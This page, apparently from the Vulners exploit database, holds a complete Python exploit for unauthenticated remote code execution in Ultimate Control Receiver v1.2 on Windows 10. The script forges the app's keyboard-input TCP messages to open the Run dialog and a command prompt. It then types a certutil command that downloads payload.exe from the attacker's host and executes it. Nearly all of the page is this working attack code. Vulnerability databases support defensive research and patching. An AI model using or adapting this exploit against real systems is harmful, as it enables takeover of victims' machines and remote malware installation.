Vulners
Lucene search
📄 Ultimate Control Receiver 1.2 Remote Code Execution
# Exploit Title: Ultimate Control Receiver (v1.2) - Remote Code Execution
# Date: 2/08/2025
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.negusoft.com/
# Software Link: https://www.negusoft.com/ucontrol/downloads/pc.html
# Version: 1.2
# Tested on: Windows 10
'''
Description:
Ultimate Control Receiver v1.2 is vulnerable to unauthenticated remote code
execution. An attacker can exploit the keyboard input functionality over
TCP to execute arbitrary system commands on the target machine without user
interaction.
'''
import socket
import time
import struct
TARGET_IP = "192.168.1.203"
TARGET_PORT = 13894
LHOST = "192.168.1.63"
VK_RETURN = 0x0D
VK_LWIN = 0x5B
VK_R = 0x52
def create_type_char_message(character):
msg = bytearray(32)
msg[0] = 18
msg[1] = 18
char_code = ord(character)
struct.pack_into(">I", msg, 4, char_code)
struct.pack_into(">Q", msg, 24, int(time.time() * 1000))
return msg
def create_key_input_message(vk_code, input_type=0, command=False):
msg = bytearray(32)
msg[0] = 17
msg[1] = 17
flags = 1 << 4 if command else 0
msg[2] = flags
if input_type == 0:
msg[3] = 0
elif input_type == 1:
msg[3] = 3
elif input_type == 2:
msg[3] = 1
struct.pack_into(">I", msg, 4, vk_code)
struct.pack_into(">Q", msg, 24, int(time.time() * 1000))
return msg
def send_character(sock, character):
sock.send(create_type_char_message(character))
time.sleep(0.05)
def send_string(sock, text):
for char in text:
send_character(sock, char)
def send_win_r():
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(5)
try:
s.connect((TARGET_IP, TARGET_PORT))
s.sendall(bytes([3, 3] + [0]*30))
s.recv(32)
s.send(create_key_input_message(VK_LWIN, 2, True))
s.send(create_key_input_message(VK_R, 2, True))
s.send(create_key_input_message(VK_R, 1, True))
s.send(create_key_input_message(VK_LWIN, 1, True))
time.sleep(0.5)
return True
except Exception:
return False
def send_cmd_command():
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(10)
try:
s.connect((TARGET_IP, TARGET_PORT))
s.sendall(bytes([3, 3] + [0]*30))
s.recv(32)
command = f"certutil -urlcache -f http://{LHOST}/payload.exe
\\windows\\temp\\payload.exe && \\windows\\temp\\payload.exe"
send_string(s, command)
s.send(create_key_input_message(VK_RETURN))
return True
except Exception:
return False
def main():
if not send_win_r():
return
time.sleep(3)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(10)
try:
s.connect((TARGET_IP, TARGET_PORT))
s.sendall(bytes([3, 3] + [0]*30))
s.recv(32)
send_string(s, "cmd")
s.send(create_key_input_message(VK_RETURN))
time.sleep(2)
except Exception:
return
time.sleep(3)
if not send_cmd_command():
return
if __name__ == "__main__":
main()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Aug 2025 00:00Current
9High risk
Vulners AI Score9